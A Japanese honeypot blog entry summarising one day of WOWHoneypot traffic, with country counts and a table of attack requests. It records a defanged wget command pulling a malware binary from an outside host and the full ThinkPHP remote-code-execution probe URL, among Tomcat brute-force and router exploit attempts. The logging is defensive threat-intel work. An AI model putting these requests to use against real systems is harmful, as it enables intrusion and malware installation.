23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(96日目)

2019/06/20(木)

トータルは4071件です。

ハンティングログは以下です。

201.203.31[.]138 wget+hxxp[:]//185.244.25[.]157/lx/apep.mpsl

www.virustotal.com


IPのロケーション別の件数は以下です。

クロアチア 4002
アメリ 14
ブラジル 13
中国 8
オランダ 7
イラン 4
トルコ 4
インド 3
チェコ 2
ロシア 1
ポーランド 1
ブルガリア 1
スペイン 1
ウクライナ 1
カナダ 1
カンボジア 1
コスタリカ 1
イタリア 1
セーシェル 1
アルゼンチン 1
ドミニカ 1
シンガポール 1

f:id:sec23:20190621004524p:plain

件数 概要 リクエス
4007 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
44 アクセス GET /
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 Linksys ルータの E シリーズの脆弱性を狙った通信 POST /tmUnblock.cgi
1 調査 HEAD /
1 不正中継の調査 GET hxxp://www.ceek.jp/?0.933676185218651781151064
1 不正中継の調査 GET hxxp://www.ceek.jp/?0.7065259536324840778000
1 不正中継の調査 GET hxxp://www.ceek.jp/?0.2804593076593769466272
1 不正中継の調査 GET hxxp://www.ceek.jp/?0.2205020227169456516587460
1 不正中継の調査 GET hxxp://www.ceek.jp/?0.1177614417016722002213328
1 不正中継の調査 GET hxxp://www.baidu.com/?0.758564999210206122124496
1 不正中継の調査 GET hxxp://www.baidu.com/?0.6684223160459600856648
1 不正中継の調査 GET hxxp://www.baidu.com/?0.5013175340413640757804
1 不正中継の調査 GET hxxp://www.baidu.com/?0.256517259015724831998332
1 不正中継の調査 GET hxxp://www.baidu.com/?0.1448026108817862122909200
1 サイト構成の調査 GET /sitemap.xml
1 クローリング GET /robots.txt
1 アクセス GET /favicon.ico
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 SSL証明書発行時の一時ファイルの調査 GET /.well-known/security.txt